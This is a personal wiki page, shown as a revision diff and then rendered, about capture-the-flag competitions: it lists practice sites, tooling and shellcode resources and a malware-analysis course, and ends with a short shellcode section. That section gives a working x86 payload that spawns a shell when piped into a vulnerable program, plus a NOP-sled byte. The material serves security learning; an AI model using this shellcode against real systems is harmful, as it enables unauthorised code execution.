Differences between revisions 3 and 21 (spanning 18 versions)
Revision 3 as of 2019-12-09 12:08:56
Size: 150
Editor: Sciuro
Comment:
Revision 21 as of 2020-06-06 15:19:40
Size: 1940
Editor: Sciuro
Comment:
Deletions are marked like this. Additions are marked like this.
Line 1: Line 1:
#acl All:read #acl CTFGroup:read,write,revert All:read
Line 3: Line 3:
I like to do some CTF's once in a while. I started to write an guide for the more special CTF's I did. = Public CTFs =
CTF's are fun to do. I like to do some CTF's once in a while and I started to write an guide for the more special CTF's I did. Current CTF's can be found on [[https://ctftime.org/ctfs|CTFtime.org]].

|| '''Name''' || '''Level''' || '''Description''' ||
|| [[https://overthewire.org/|Over the wire]] || Beginner to expert || Starting from learning SSH to reverse engineering. ||
|| [[https://picoctf.com/|Pico CTF]] || Beginner to expert || A good CTF to learn working on *nix systems and way beyond. ||
|| [[https://www.certifiedsecure.com/|Certified Secure]] || Beginner to expert || A dutch site about learning the basics. ||

More lists of CTF's can be found on the site of [[https://apsdehal.in/awesome-ctf/|Awesome CTF]], [[https://www.csoonline.com/article/3341318/top-tools-and-resources-for-running-a-capture-the-flag-competition.html|CSO]] and [[https://fareedfauzi.github.io/ctfonline/#|Fareed Fauzi]]. Feel free to send me other CTF's. <<MailTo(ctf AT sciuro DOT org)>>

= Helpfull rescources =
 * General techniques: [[https://ctf101.org/|ctf101.org]]
 * Tooling: [[https://github.com/zardus/ctf-tools]]
 * Shellcode: [[http://shell-storm.org/shellcode/]] [[https://dhavalkapil.com/blogs/Shellcode-Injection/]]

= Handouts =
These are handouts about CTF's I did in the past. It's your call if you want to see answers.
Line 5: Line 22:

= Lectures =
Not a CTF, but well worth for learning.

|| '''Name''' || '''Level''' || '''Description''' ||
|| [[https://class.malware.re/|UC Malware Analysis]] || ?? || Introduction to Malware Analysis and Reverse Engineering ||

= Shellcode =
== Shell ==
Spawn a shell:
{{{
(echo -en "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\n"; cat) | ./prog
}}}

== NOP ==
For a NOP Sled, add a lot of times:
{{{
\x90
}}}

Public CTFs

CTF's are fun to do. I like to do some CTF's once in a while and I started to write an guide for the more special CTF's I did. Current CTF's can be found on CTFtime.org.

Name

Level

Description

Over the wire

Beginner to expert

Starting from learning SSH to reverse engineering.

Pico CTF

Beginner to expert

A good CTF to learn working on *nix systems and way beyond.

Certified Secure

Beginner to expert

A dutch site about learning the basics.

More lists of CTF's can be found on the site of Awesome CTF, CSO and Fareed Fauzi. Feel free to send me other CTF's. <ctf AT sciuro DOT org>

Helpfull rescources

Handouts

These are handouts about CTF's I did in the past. It's your call if you want to see answers.

Lectures

Not a CTF, but well worth for learning.

Name

Level

Description

UC Malware Analysis

??

Introduction to Malware Analysis and Reverse Engineering

Shellcode

Shell

Spawn a shell:

(echo -en "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\n"; cat) | ./prog

NOP

For a NOP Sled, add a lot of times:

\x90

CTF (last edited 2020-06-06 15:19:40 by Sciuro)